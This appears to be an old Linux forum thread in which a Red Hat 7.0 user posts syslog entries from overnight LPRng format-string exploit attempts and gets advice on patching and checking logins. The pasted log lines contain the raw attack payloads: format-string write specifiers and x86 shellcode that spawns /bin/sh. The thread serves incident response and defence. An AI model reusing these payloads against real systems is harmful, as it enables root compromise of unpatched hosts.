RH7.0
This I read most likely comprimised my root.
What other logs can I look in to try and get an idea of what this person did at 3:30 am last nite?
This was out of my /var/log/messages :
******************************************************
Apr 30 03:31:08 linux SERVER[6812]: Dispatch_input: bad request line 'BBØóÿ¿Ùóÿ¿Úóÿ¿Ûóÿ¿XXXXXXXXXXXXXXXXXX%.1
52u%300$n%.25u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:08 linux SERVER[6813]: Dispatch_input: bad request line 'BBÔóÿ¿Õóÿ¿Öóÿ¿×óÿ¿XXXXXXXXXXXXXXXXXX%.1
48u%300$n%.29u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:08 linux SERVER[6814]: Dispatch_input: bad request line 'BBÐóÿ¿Ñóÿ¿Òóÿ¿Óóÿ¿XXXXXXXXXXXXXXXXXX%.1
44u%300$n%.33u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:08 linux SERVER[6815]: Dispatch_input: bad request line 'BBÌóÿ¿Íóÿ¿Îóÿ¿Ïóÿ¿XXXXXXXXXXXXXXXXXX%.1
40u%300$n%.37u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:09 linux SERVER[6816]: Dispatch_input: bad request line 'BBÈóÿ¿Éóÿ¿Êóÿ¿Ëóÿ¿XXXXXXXXXXXXXXXXXX%.1
36u%300$n%.41u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:09 linux SERVER[6817]: Dispatch_input: bad request line 'BBÄóÿ¿Åóÿ¿Æóÿ¿Çóÿ¿XXXXXXXXXXXXXXXXXX%.1
32u%300$n%.45u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:09 linux SERVER[6818]: Dispatch_input: bad request line 'BBÀóÿ¿Áóÿ¿Âóÿ¿Ãóÿ¿XXXXXXXXXXXXXXXXXX%.1
28u%300$n%.49u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:10 linux SERVER[6819]: Dispatch_input: bad request line 'BB¼óÿ¿½óÿ¿¾óÿ¿¿óÿ¿XXXXXXXXXXXXXXXXXX%.1
24u%300$n%.53u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Apr 30 03:31:10 linux SERVER[6820]: Dispatch_input: bad request line 'BB¸óÿ¿¹óÿ¿ºóÿ¿»óÿ¿XXXXXXXXXXXXXXXXXX%.1
20u%300$n%.57u%301$nsecurity%302$n%.192u%303$n1Û1É1À°FÍ
å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
****************************************************

How can I stop this? Fawwwwwwwk!

Advovate,

Someone has "attempted" to get into your system through LPR's logging function.

Doesn't look like they got root access but they did use the LPRng string format _syslog bug, that could allow root access.

So far to my knowledge no one has managed to get root through this bug.

I have one suggestion just in case
GO PATCH IT NOW....

Then all those nasty messages will go away.

i386:
ftp://updates.redhat.com/7.0/en/os/i....24-2.i386.rpm

sources:
ftp://updates.redhat.com/7.0/en/os/S...6.24-2.src.rpm

Check out the command "last" and work out who was logged on at that time.

Bye,
/Raz

I appreciate you taking the time to view the post.

And not having root comprimised was such a relief to see you say!

I have already upgraded to RH7.1 (Seawolf). The one message I didnt post from my log file is as follows:
(this entry was made 30 seconds before the LPRng exploit started happening, would you consider this a likely candidate for the source?)

Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'

Again thanks for your time!

Advocate,

I that log message was not the person entering your system, but it is a message resulting in something they may have done with DIG or NSLOOKUP.

I guess they have been on the system before that time you got in the first LPRng bug logs.

------------
Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'
------------

The DNS records say that 216.219.239.221 should be a server for the 216.219.239.0 zone, but when in'239.219.216.in-addr. was asked for a record in the 216.219.239.0 it said that it wasn't authorities for that zone.
i.e a zone transfer attempt failed.

Looks like they knew what they were doing.

/Raz